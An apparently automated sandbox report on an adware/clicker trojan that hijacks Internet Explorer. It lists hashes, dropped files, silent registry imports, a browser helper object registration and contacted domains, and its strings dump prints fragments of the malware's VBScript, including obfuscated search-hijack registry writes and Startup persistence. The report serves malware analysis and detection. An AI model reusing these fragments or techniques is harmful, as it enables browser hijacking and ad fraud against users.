Analysis Date2014-03-02 14:39:52
MD564be3dc5e93a1006919b4c52bddcae52
SHA1ffbc3bff8926ca4085f8ec9e393e767b231d9c1b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: 7230075380b7280f3e2859b980580b33 sha1: adbe5aa7fa7832dfbdb4ec3f0288127f63e01125 size: 147456
SectionUPX1 md5: 4084e1dfb1e28e8148f85afc4542b0d2 sha1: e28c8db36f94e59d8767213a2e0e2d8584e95587 size: 38912
Section.rsrc md5: 5fc1f79cbd0cb3d357c338dccff9c68f sha1: 6a44da45557968eadbd63ba067bf70f9e5a72aa2 size: 8192
Timestamp2010-05-16 13:58:29
VersionInternalName: bho
FileVersion: 1.00
CompanyName: 微软中国
ProductName: Install
ProductVersion: 1.00
OriginalFilename: bho.exe
PackerMicrosoft Visual Basic v5.0
PEhash3905e0b48dc1ae1a798de15617de09e05ae086bc
IMPhash87e2b4affcdfc34a066df66430210947
AVmcafeeAdClicker-IX
AVmsseTrojanClicker:Win32/VB.CQ
AVaviraTR/BHO.agkj.17

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\WINDOWS\myhost\dlldll.vbe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\dlldll.vbe
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\system.vbe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DFCC90.tmp
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\reg.reg
Creates FileC:\WINDOWS\hi\Qvod7544.062.dll
Creates FileC:\WINDOWS\WindowsStrongIndex.reg
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\iesearch.vbe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\iecollection.vbe
Creates FileC:\WINDOWS\hi\smss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014030220140303\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\index.dat
Creates Processcmd /c regedit.exe /s C:\WINDOWS\reg.reg
Creates Processcmd /c regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg
Creates Processregsvr32.exe /s "C:\WINDOWS\hi\Qvod7544.062.dll"
Creates ProcessC:\WINDOWS\hi\smss.exe
Creates Mutex_!SHMSFTHISTORY!_
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!mshist012014030220140303!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNStongji.dianxin.cn
Winsock DNSwww.mylovewebs.cn

Process
↳ cmd /c regedit.exe /s C:\WINDOWS\reg.reg

Creates Processregedit.exe /s C:\WINDOWS\reg.reg

Process
↳ cmd /c regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg

Creates Processregedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg

Process
↳ C:\WINDOWS\hi\smss.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DFE19.tmp
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Winsock DNSwww.mylovewebs.com
Winsock DNSstat.aectime.com

Process
↳ regsvr32.exe /s "C:\WINDOWS\hi\Qvod7544.062.dll"

RegistryHKEY_CLASSES_ROOT\QvodAdBlocker.QvodBlock\ ➝
QvodAdBlocker.QvodBlock\\x00
RegistryHKEY_CLASSES_ROOT\Interface\{C4DABBBE-E3A6-4042-B1EE-DA2F0588A122}\ ➝
QvodBlock\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{B8804261-8DC9-4356-AB35-296E07D53A96}\ ➝
QvodAdBlocker.QvodBlock\\x00

Process
↳ regedit.exe /s C:\WINDOWS\reg.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B8804261-8DC9-4356-AB35-296E07D53A96}\ ➝
??????\\x00

Process
↳ regedit.exe /s C:\WINDOWS\WindowsStrongIndex.reg

RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\Command\ ➝
Rundll32.exe\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\ ➝
????(&H)\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\InProcServer32\ ➝
%SystemRoot%\system32\shdocvw.dll\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ShellFolder\ ➝
00.00.00.00\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\DefaultIcon\ ➝
C:\Program Files\Internet Explorer\iexplore.exe,0\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ ➝
Internet Explorer\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}\ ➝
Internet Explorer\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\ ➝
??(&D)\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command\ ➝
C:\Program Files\Internet Explorer\iexplore.exe http://www.dianxin.cn?Lnk\\x00
RegistryHKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\??(&R)\Command\ ➝
rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0\\x00

Network Details:

DNSwww.mylovewebs.com
Type: A
DNSstat.aectime.com
Type: A
DNStongji.dianxin.cn
Type: A
DNSwww.mylovewebs.cn
Type: A

Raw Pcap

Strings
o
.

@="00.00.00.00"
080404B0
1.00
118114
12043901_0_0
127.0.0.1
@200#
5.03.0251
about:blank
about:Tabs
aectime
*\AH:\U
alimama
AllUsersStartup
appendChild
async
"Attributes"=hex:00,00,00,00
{B8804261-8DC9-4356-AB35-296E07D53A96}
baidu
\BHO
bho.exe
bingj
body
\??\C:
Call Main
Charset
Click
cmd /c regedit.exe /s 
.com/data.xml
CompanyName
.com/tongji.htm?smss
count
C:\Program Files
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
createElement
CUSTOM
" /d "
(&D)"
dangdang.com
?dangdang_id=P-273667
&dangdang_id=P-273667
/Data/OpenUrl
/Data/OpenUrlTime
/Data/Url
    dim exePath
.dll
\dlldll.vbe
dlldll.vbe
{dll_path}
Document
documentElement
doubleclick
Edit
End Sub
.exe 
ExecQuery
execScript
    exePath="
" /f
FileDescription
FileVersion
gb2312
getAttribute
getElementsByTagName
google
googleadservices
(&H)"
Height
\hi\
Hide
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\DefaultIcon]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\InProcServer32]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ShellFolder]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q]
[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\Command]
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}]
\hostbhoreg.reg
\host.DLL
href
http://
http://168.xoyo.com/
http://168.xoyo.com/80629156
http://h1.untang.com/jump.vip?s=5007684|7185
http://hao.360.cn/
http://js5.18
http://mall.taobao.com/
http://my.xoyo.com/Personinfo/reg/
https://pass.kingsoft.com/register-reg
http://stat.
http://taobao.com
http://taobao.com/
http://tg.sdo.com/1119148908
http://tongji.dianxin.cn/api/work.aspx?cmd=
http://union.dangdang.com/transfer/transfer.aspx?from=P-273667&backurl=
http://w
http://www.
http://www.114la.com/
http://www.2345.com/
http://www.amazon.cn
http://www.amazon.cn/
http://www.amazon.cn/mn/assocLinkApp?action=asso_search&k=2&source=soarem-23
http://www.amazon.cn/mn/channel?ref=GT&pageletid=xinjiang&uid=475-0678279-4240539&channelCode=book
http://www.amazon.cn/mn/channel?ref=GT&pageletid=xinjiang&uid=475-0678279-4240539&channelCode=mobile
http://www.amazon.cn/mn/channel?ref=GT&pageletid=xinjiang&uid=475-0678279-4240539&channelCode=toy
http://www.amazon.cn/mn/gt?pageletid=headother
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=11&keywords=
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=1&keywords=
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=2&keywords=
http://www.amazon.cn/mn/searchApp?source=soarem-23&searchType=5&keywords=
http://www.baidu.com
http://www.baidu.com/
http://www.dianxin.cn?Lnk
http://www.hao123.com/
http://www.mylovewebs.com/api/baidu/index.htm
http://www.mylovewebs.com/api/index/index.htm
http://www.mylovewebs.com/api/sogou/index.htm
http://www.mylovewebs.com/api/taobao/index.htm
http://www.mylovewebs.com/daohangad.htm
http://www.paipai.com/
http://www.sogou.com
http://www.sogou.com/
http://www.taobao.com
http://www.taobao.com/
http://youa.baidu.com/content/index.html
\IEAdBlocker.vbp
\iecollection.vbe
IEFrame
\iesearch.vbe
\ie.vbe
\ie.vbp
_IID_QVODBLOCK
Install
\Install.vbp
InternalName
@="Internet Explorer"
IPAddress
javascript:
jpeg
@@,l
Left
length
Load
Macaddress
Maxthon2_Frame
Microsoft.XMLDOM
Microsoft.XMLHTTP
{move_path}
\myhost\
mylovewebs
mymss
o.com/ie.js
OLESelfRegister
onClick
On Error Resume Next
onmousedown
onMouseDown
open
Open
OriginalFilename
ovewebs.cn/go.htm
ovewebs.com/api/tanchuang/url.htm
ovewebs.com/tongji.htm?id=
P-273667
parentwindow
ProductName
ProductVersion
Qvod
Qvod64
Qvod64.dll
(&R)]
(&R)\Command]
ReadyState
redirect.php
reg add 
REG_DWORD
register.sdo.com/PTNew/index.aspx?from=0
reg.kaixin.com/register.do
{regPath}
\reg.reg
reg.renren.com
regsvr32.exe /s "
Regwrite
responseText
RichEdit20W
/root/cimv2
@="Rundll32.exe"
@="rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0"
safemon
SCRIPT
scrollby
sdo.com
search_web.html
Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE
Select * From Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE
selectNodes
selectSingleNode
send
    Set ws = CreateObject("WScript.Shell")
    Set WshShell= CreateObject("WScript.Shell")
    Set WshShell = Nothing
smss
smss.exe
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run\360Disabled
sogou
SpecialFolders
Startup
stat_kw.html
StringFileInfo
Sub Main()
SYSTEM
@="%SystemRoot%\\system32\\shdocvw.dll"
\system.vbe
taobao.com
{taobao_guid}
 Tencent Traveler 
Text
tg.sdo.com/1
Translation
\*.txt
TYPELIB
 /v "
VarFileInfo
VBForm
VS_VERSION_INFO
Width
windir
window.alert=null;
window.confirm=null;
window.open=null;
Windows
window.showModalDialog=null;
Windows Registry Editor Version 5.00
\WindowsStrongIndex.reg
winmgmts:
winmgmts://
Wscript.shell
WSCRIPT.SHELL
    wscript.sleep 60*1000
    WshShell.Run exePath
ww.myl
www.taobao.com/go/chn/store/index.php
XFrame_Wnd
xoyo.com
youdao
yyyy-mm-dd
      
        
         
                
                         
         '
        '
(000(#
02$8-81
0aStrToHex
<0=@=D=H=
}=0K!&
0W@W/f
1069DEA
1.0 CLASQvodBlock
-11D0-BFE9|
1E04581-4E
\1l1t1x1|1
2"-089
2(2,2024282<2X2l2
2$2(2,242<2@2D2H2L2P2T2X2\2`2d2t2x2|2
2(232C2[2f2
;(<2<C<
2VVVVVVVVVVVV
31a5(c
3 3&3,32383>3D3J3P3V3\3b3h3n3t3z3
33333333
33333333333354.wf
3,34383<3V3[3`3l3q3v3
3'3L3y3
3"4,474G4V4`4k4r4x4
\389u 
4"4(4.444:4@4F4L4R4X4^4d4j4p4v4|4
:4;8;D;`;p;
4E334.6
5(60646<6@6D6X8d8l8x8|8
?5aaG!
5h5r5}5
6%606:6g6
%69@5*3)
6$D98D
;6;?;^;d;t;z;
6ZCm1q
![745)
78m<jp
871C5380-42A
>*>8>B>I>c>o>
8J8^8y8
8<M-JCP/E1
8}@_QvodBlockWWd
9 9(989H9P9d9h9l9p9t9x9|9
9A}\}F
a?5bb3
ADForms
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
AdMainss
adTimer
advapi32.dll
adWebBrowser
_allmul
    allUsersPcDesktopPath = wshShell.SpecialFolders("AllUsersDesktop") '
    allUsersPcDesktopPath = WshShell.SpecialFolders("AllUsersDesktop") '
    allUsersPrograms = wshShell.SpecialFolders("AllUsersPrograms") '
    allUsersStartMenu = wshShell.SpecialFolders("AllUsersStartMenu") '
autoTimer
B580CF65-E151-49C3-B73F-70B13Fc-
b/g	gP
bigNodeName
bingWebBrowser
:Bsf9Bs{7Bs
CA8E86J
    Call CreateLnk("
        Call CreateLnk(url)
        Call IeIndex(url)        
    Call IeLink("
    Call IeLink("4399
    Call IeLink("Google
    Call IeSearch()
Call Main
        Call ReplaceBrowserLink(url)
        Call SetBhoo
    Call ShowIeLink
?CEF59
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
className
classNames
CloseHandle
Cookies
C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
CreateFile
CreateToolhelp32Snapshot
c{)ScU
C:\WINDOWS\system32\ieframe.dll
C:\WINDOWS\system32\ieframe.oca
C:\WINDOWS\system32\msvbvm60.dll\3
(&D)"""
d1ao65"
D.!AH,
`.data
    dataHome=OperationRegistry.RegRead("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command\") 
    data=OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\" & taobao_guid & "\") 
    data=OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}\") 
DelAllClick
DelClick
DelRegValue
deU2")=
;=d"hn
    Dim allUsersPcDesktopPath, allQuickLaunch, allUsersPrograms, allUsersStartMenu
    Dim allUsersPcDesktopPath, allUsersPrograms, allUsersStartMenu
    Dim allUsersPcDesktopPath,ieLinkPath
    Dim data
    Dim data,dataHome
    Dim directory
    Dim dll_path,move_path,taobao_guid,regPath
dim ie
    Dim ieLinkPath
    dim ie_temp_path
        dim index
    Dim lnkPath(7)
    Dim maxthonLinkPath
    Dim OperationRegistry 
    Dim regPath
    Dim regPathSeven
    Dim regPathSix 
    Dim startup
    Dim strDesktop, pcDesktopPath, quickLaunch, strQuickLaunch, programs, startMenu
dim tips_count
    dim url
    Dim wshShell, oShellLink
        directory = lnkPath(i)        
        directory=startup'
DllCanUnloadNow
DllFunctionCall
DllGetClassObject
    dll_path="{dll_path}"
DllRegisterServer
DllUnregisterServer
    do         
DU\-s[q
e4,5du
e,d1bf
EF (N	00	C
    else
End Function
                end if
            end if
    end if
        End if    
            End If
    End If
End Sub
EnumProcessModules
EnumWindows
EsEjGs
EsetGs
Es$FGs
EVENT_SINK2_AddRef
EVENT_SINK2_Release
EVENT_SINK_AddRef
EVENT_SINK_GetIDsOfNames
EVENT_SINK_Invoke
EVENT_SINK_QueryInterface
EVENT_SINK_Release
ewdtup!
            execute "dim   wind_"   &   index   
            execute "set wind_"   &   index   &   "=fso.opentextfile(""" & myName & """)"
exeName
        Exit Function
ExitProcess
=(=F=`=
	    f1.WriteLine "@=""
	    f1.WriteLine "@=""00.00.00.00"""
	    f1.WriteLine """Attributes""=hex:00,00,00,00"
    f1.WriteLine """DefaultScope""=""{B2D17A31-2642-4D03-9D1F-ABD3BE1DCC4E}"""
    f1.WriteLine """DisplayName""=""
    f1.WriteLine """DisplayName""=""Google"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{B2D17A31-2642-4D03-9D1F-ABD3BE1DCC4E}.ico"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{CEF59996-ACD3-43B5-80AA-FAAA6CDD98DE}.ico"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{E140FB5B-2A9D-4FA4-A20F-089B92412200}.ico"""
    f1.WriteLine """FaviconPath""=""C:\\Documents and Settings\\Administrator\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\Services\\search_{F8032AB1-9479-4E5E-8417-9A4207FE9F7F}.ico"""
    f1.WriteLine """FaviconURL""=""http://www.baidu.com/favicon.ico"""
    f1.WriteLine """FaviconURL""=""http://www.google.cn/favicon.ico"""
    f1.WriteLine """FaviconURL""=""http://www.sogou.com/favicon.ico"""
    f1.WriteLine """FaviconURL""=""http://www.taobao.com/favicon.ico"""
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}]" '
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\DefaultIcon]" '
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\InProcServer32]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\ShellFolder]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\OpenHomePage\Command]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q]"
	    f1.WriteLine "[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309A}\Shell\Q\Command]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{B2D17A31-2642-4D03-9D1F-ABD3BE1DCC4E}]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{CEF59996-ACD3-43B5-80AA-FAAA6CDD98DE}]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{E140FB5B-2A9D-4FA4-A20F-089B92412200}]"
    f1.WriteLine "[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\{F8032AB1-9479-4E5E-8417-9A4207FE9F7F}]"
	    f1.WriteLine "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\" & taobao_guid & "]"
	    f1.WriteLine "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{871C5380-42A0-1069-A2EA-08002B30309A}]" '
	    f1.WriteLine "@=""Internet Explorer""" '
    f1.WriteLine """OSDFileURL""=""http://www.mylo" & "vew" &  "bs.com/api/baidu/open.xml"""
    f1.WriteLine """OSDFileURL""=""http://www.mylo" & "ve" &  "wbs.com/" & "api" & "/google/open.xml"""
    f1.WriteLine """OSDFileURL""=""http://www.myl" & "ovew" &  "bs.com/api/sogou/open.xml"""
    f1.WriteLine """OSDFileURL""=""http://www.mylo" & "ve" &  "wbs.com/" & "api" & "/taobao/open.xml"""
	    f1.WriteLine "@=""" & Replace(ie_temp_path, "\", "\\") & ",0""" '
	    f1.WriteLine "@=""" & Replace(ie_temp_path, "\", "\\") & " " & url & """" '
	    f1.WriteLine "@=""Rundll32.exe"""
	    f1.WriteLine "@=""rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0"""
    f1.WriteLine """SortIndex""=dword:00000001"
    f1.WriteLine """SortIndex""=dword:00000002"
    f1.WriteLine """SortIndex""=dword:00000005"
    f1.WriteLine """SortIndex""=dword:00000006"
	    f1.WriteLine "@=""%SystemRoot%\\system32\\shdocvw.dll"""
    f1.WriteLine """URL""=""http://www." & "my" &  "l" & "ove" &  "webs.com/" & "api" & "/baidu/so.htm?word={searchTerms}"""
    f1.WriteLine """URL""=""http://www.mylo" & "vew" &  "ebs.com/" & "api" & "/google/so.htm?word={searchTerms}"""
    f1.WriteLine """URL""=""http://www." & "my" &  "l" & "ov" &  "ewebs.com/" & "api" & "/sogou/so.htm?word={searchTerms}"""
    f1.WriteLine """URL""=""http://www." & "myl" &  "o" & "vew" &  "ebs.com/" & "api" & "/taobao/so.htm?word={searchTerms}"""
	    f1.WriteLine "Windows Registry Editor Version 5.00"
	f1.WriteLine "Windows Registry Editor Version 5.00"
F2CF5484E
F.3nB1-9479R@`
fD7\7i[))OV	
FDDDDDhA
]f/E@4
fHE7hfnC
                file.attributes=0'
	        file.attributes=0
	file.attributes=0
	file.attributes=0    
    file.attributes=1
    file.attributes=1 
	            file.attributes=1
	        file.attributes=1           
FileName
FindWindowA
FindWindowExA
Fm_ie_DocumentComplete
        For Each flie in fc  
        For Each flie in fc    
    For i = LBound(lnkPath) + 1 To UBound(lnkPath)
Form_Main
Fs0jGs
    fso.copyfile dll_path,move_path
        fso.copyfile move_path,dll_path
    f.WriteLine ""
    f.WriteLine "  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
    f.WriteLine "  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine "  00,00,00,00,00,00,00,00,00,5b,01,14,00,1f,50,e0,4f,d0,20,ea,3a,69,10,a2,d8,\"
    f.WriteLine "  00,00,00,00,00,00,00,00,4c,00,00,00,01,14,02,00,00,00,00,00,c0,00,00,00,00,\"
    f.WriteLine "  00,00,00,00,00,00,5c,00,31,00,00,00,00,00,8c,3a,cb,23,10,00,44,4f,43,55,4d,\"
    f.WriteLine "  00,00,00,00,00,00,5c,00,31,00,00,00,00,00,8e,3a,b9,15,10,00,44,4f,43,55,4d,\"
    f.WriteLine "  00,00,00,00,00,00,5c,00,31,00,00,00,00,00,a5,3c,28,4a,10,00,44,4f,43,55,4d,\"
    f.WriteLine "  00,00,00,00,00,8c,3a,ce,23,11,00,46,41,56,4f,52,49,7e,31,00,00,3e,00,03,00,\"
    f.WriteLine "  00,00,00,00,00,a2,3c,80,96,11,00,46,41,56,4f,52,49,7e,31,00,00,3e,00,03,00,\"
    f.WriteLine "  00,00,00,00,00,a6,3c,76,0f,11,00,46,41,56,4f,52,49,7e,31,00,00,3e,00,03,00,\"
    f.WriteLine "  00,00,00,02,00,00,00,21,07,00,00,a0,0f,00,00,04,00,00,00,21,01,00,00,a0,0f,\"
    f.WriteLine "  00,00,00,02,00,00,00,a1,06,00,00,60,01,00,00,04,00,00,00,a1,00,00,00,c6,00,\"
    f.WriteLine "  00,00,03,00,00,00,20,03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine "  00,00,03,00,00,00,a1,02,00,00,d4,04,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine "  00,00,46,81,00,00,00,10,00,00,00,10,a1,55,c0,ff,e9,ca,01,18,bf,0f,fd,11,ed,\"
    f.WriteLine "  00,00,46,81,00,00,00,10,00,00,00,9e,d1,0e,c2,33,ec,ca,01,e6,1a,bf,65,c5,ed,\"
    f.WriteLine "  00,00,46,81,00,00,00,10,00,00,00,fe,b8,49,65,27,bb,c9,01,12,c0,b1,6e,27,bb,\"
    f.WriteLine "[{000214A0-0000-0000-C000-000000000046}]"
    f.WriteLine "  00,04,00,ef,be,8c,3a,cb,23,8c,3a,cc,23,14,00,00,00,41,00,64,00,6d,00,69,00,\"
    f.WriteLine "  00,04,00,ef,be,8c,3a,cb,23,a5,3c,05,86,14,00,00,00,41,00,64,00,6d,00,69,00,\"
    f.WriteLine "  00,04,00,ef,be,a5,3c,28,4a,a7,3c,f1,48,14,00,00,00,41,00,64,00,6d,00,69,00,\"
    f.WriteLine "  00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,00,00,18,00,4a,00,\"
    f.WriteLine "  00,69,00,74,00,65,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,\"
    f.WriteLine """{01E04581-4EEE-11D0-BFE9-00AA005B4383}""=hex:81,45,e0,01,ee,4e,d0,11,bf,e9,00,\"
    f.WriteLine "  04,00,ef,be,8c,3a,cb,23,8c,3a,ce,23,14,00,28,00,46,00,61,00,76,00,6f,00,72,\"
    f.WriteLine "  04,00,ef,be,a2,3c,00,70,a2,3c,80,96,14,00,28,00,46,00,61,00,76,00,6f,00,72,\"
    f.WriteLine "  04,00,ef,be,a5,3c,28,4a,a7,3c,33,44,14,00,28,00,46,00,61,00,76,00,6f,00,72,\"
    f.WriteLine "  08,00,2b,30,30,9d,19,00,2f,43,3a,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,\"
    f.WriteLine """{0E5CBF21-D15F-11D0-8301-00AA005B4383}""=hex:21,bf,5c,0e,5f,d1,d0,11,83,01,00,\"
    f.WriteLine "[1]"
    f.WriteLine "  17,a7,2f,9d,10,1c,92,a9,ac,9d,ce,58,df,11,a8,ce,00,1e,65,ca,82,46,08,ff,f6,\"
    f.WriteLine "  17,a7,2f,9d,10,1c,dd,0c,5a,86,1a,27,de,11,b2,8a,86,62,af,bb,9f,a2,08,ff,f6,\"
    f.WriteLine "  18,08,88,87,00,00,00,00"
    f.WriteLine "[2]"
    f.WriteLine "  2a,00,00,00,01,00,00,00,80,06,00,00,80,01,00,00,03,00,00,00,81,02,00,00,00,\"
    f.WriteLine "  2d,e9,27,70,49,22,00,1c,00,08,00,00,00,06,00,00,00,01,00,00,00,00,00,00,00,\"
    f.WriteLine "[3]"
    f.WriteLine "  31,00,00,00,00,00,8c,3a,cc,23,10,00,41,44,4d,49,4e,49,7e,31,00,00,32,00,03,\"
    f.WriteLine "  31,00,00,00,00,00,a5,3c,05,86,10,00,41,44,4d,49,4e,49,7e,31,00,00,32,00,03,\"
